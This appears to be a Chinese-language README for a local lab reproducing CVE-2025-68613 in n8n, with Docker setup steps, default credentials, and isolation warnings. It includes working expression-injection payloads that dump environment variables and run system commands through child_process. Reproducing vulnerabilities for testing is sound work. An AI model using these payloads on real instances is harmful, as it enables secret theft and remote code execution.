本仓库提供了一个简单的 Docker Compose 配置,用于运行一个存在漏洞的 n8n 实例,以便在本地测试 CVE-2025-68613。
启动容器:
docker compose up -d
在浏览器中打开 n8n:
使用 docker-compose.yml 中设置的默认凭据登录:
adminpassworddocker compose down
此环境仅用于本地隔离测试。请勿将此实例暴露到公共互联网或任何不受信任的网络。请将其保留在专用、仅限本地的网络网段中,并与生产系统隔离。使用风险自负。
容器运行后,您可以通过 http://localhost:5678 访问 n8n 界面。要测试该漏洞,您需要在表达式字段中注入恶意的 JavaScript 载荷。 复现步骤:
{{ (function() { return this.process.env; })() }}

测试 2:远程代码执行(RCE) 此载荷尝试加载 child_process 模块以运行系统命令(例如 whoami)。
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

预期结果:如果环境存在漏洞,Set 节点的“Output”面板将显示命令的执行结果(例如 root 或 n8n 用户),或包含环境变量的 JSON 对象。如果实例已修补(例如 1.122.0+ 版本),沙箱将返回空对象或错误。